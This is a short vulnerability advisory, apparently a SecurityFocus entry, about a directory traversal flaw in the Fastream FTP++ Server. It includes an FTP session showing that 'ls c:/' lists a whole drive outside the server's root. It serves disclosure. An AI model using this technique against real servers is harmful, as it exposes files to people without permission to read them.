11 lines
No EOL
451 B
Text
11 lines
No EOL
451 B
Text
source: http://www.securityfocus.com/bid/2267/info
|
|
|
|
It is possible for a remote uesr to gain read permissions outside of the Faststream FTP++ Server directory. By requesting an 'ls' command along with the drive name, Fastream FTP++ will disclose the contents of the requested drive.
|
|
|
|
ftp> pwd
|
|
257 "/C:/FTPROOT/" is current directory.
|
|
ftp> ls c:/
|
|
200 Port command successful.
|
|
150 Opening data connection for directory list.
|
|
|
|
(listing of c:\) |